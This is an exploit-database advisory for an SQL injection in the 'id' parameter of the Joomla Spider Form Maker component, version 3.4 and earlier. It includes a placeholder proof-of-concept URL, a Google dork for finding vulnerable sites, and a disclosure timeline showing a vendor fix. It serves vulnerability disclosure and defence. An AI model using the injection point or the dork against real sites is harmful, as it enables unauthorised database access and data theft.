Joomla! Component com_formmaker 3.4 - SQL Injection

Author: Claudio Viviani
type: webapps
platform: php
port: 
date_added: 2014-09-24 
date_updated: 2016-10-31 
verified: 0 
codes: OSVDB-111467 
tags: 
aliases:  
screenshot_url:  
application_url: 

######################

# Exploit Title : Joomla Spider Form Maker <= 3.4 SQL Injection

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://web-dorado.com/

# Software Link : http://web-dorado.com/products/joomla-form.html

# Dork Google: inurl:com_formmaker


# Date : 2014-09-07

# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox

######################

# PoC Exploit:

http://localhost/index.php?option=com_formmaker&view=formmaker&id=[SQLi]


"id" variable is not sanitized.


######################

# Vulnerability Disclosure Timeline:

2014-09-07:  Discovered vulnerability
2014-09-09:  Vendor Notification
2014-09-10:  Vendor Response/Feedback
2014-09-10:  Vendor Fix/Patch
2014-09-10:  Public Disclosure

#####################

Discovered By : Claudio Viviani
                http://www.homelab.it

                info@homelab.it
                homelabit@protonmail.ch

                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################